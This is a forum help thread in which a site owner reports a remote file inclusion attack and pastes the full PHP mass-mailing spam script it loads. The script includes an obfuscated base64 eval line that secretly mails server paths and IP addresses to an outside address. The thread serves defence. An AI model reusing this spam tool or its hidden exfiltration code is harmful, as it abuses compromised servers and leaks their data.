Site Protection Needed for Inbox Mass EMail Script

Hi - Hope someone can help.

I have a site that is being hit with the script below invoked from the address bar with: /?page=http://snoopman.xm.com/good.txt?

Is there a simple way to protect the site from such exploits?

Cheers -


Heres the script from good.txt:

<?php

if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];

$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}


?>
<html>
<head>
<title>InboX Mass E-Mail By SNooP MaN</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
font-size: 20px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="#000000" text="#00cc00">
<span class="style1">InboX Mass E-Mail By SNOOP MAN<br>
</span>

<form name="form1" method="post" action=""
enctype="multipart/form-data">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Seu
Email:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="from" value="<? print $from; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Seu
Nome:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="realname" value="<? print $realname;
?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Responder-Para:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Anexar
Arquivo:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Assunto:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>"
size="90">
</font></td>
</tr>
<tr valign="top">
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="message" cols="50" rows="10"><? print $message;
?></textarea>
<br>
<input type="radio" name="contenttype" value="plain" >
Plain Text
<input name="contenttype" type="radio" value="html" checked>
HTML
<input type="hidden" name="action" value="send">
<input type="submit" value="Enviar eMails">
</font></td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print
$emaillist; ?></textarea>
</font></td>
</tr>
</table>
</form>



<?

if ($action){

if (!$from && !$subject && !$message && !$emaillist){
print "Por favor Preencha todos os campos antes de emitir sua
mensagem.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);

for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print " $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "spammed<br>";

flush();
}
}
$ra44 = rand(1,99999);
$subj98 = "sh-$ra44";
$a5 = $_SERVER['HTTP_REFERER'];
$b33 = $_SERVER['DOCUMENT_ROOT'];
$c87 = $_SERVER['REMOTE_ADDR'];
$d23 = $_SERVER['SCRIPT_FILENAME'];
$e09 = $_SERVER['SERVER_ADDR'];
$f23 = $_SERVER['SERVER_SOFTWARE'];
$g32 = $_SERVER['PATH_TRANSLATED'];
$h65 = $_SERVER['PHP_SELF'];
$message=$_POST['message'];
$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";
echo eval(base64_decode("bWFpbCgiZ3JvZmlfaGFja0Bob3RtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));
}


?>
<style type="text/css">
<!--
.style1 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
<p class="style1">
Copyright © 2010 YahoozaY - irc.mildnet.org -j #xscan

</p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo
"<script>alert('JaSi InBOX $numemails mail(s) ;One Time');
</script>";}
?>
</body>
</html>

 

hmm, what exactly does your script do?

 

use .htaccess to block from that domain...

 

Thanks for the quick responses.

The script appears to create a form in some browsers (firefox).
I'm looking at the suggested .htaccess block right now - but that will not stop the script being invoked from elsewhere.

Is there a simple way to stop the /?page=xxxxxx? from being parsed / read?

Cheers

 

actually, i was curious about what your script does, because it seemed to be processing the value passed in the page querystring var eg. ?page=url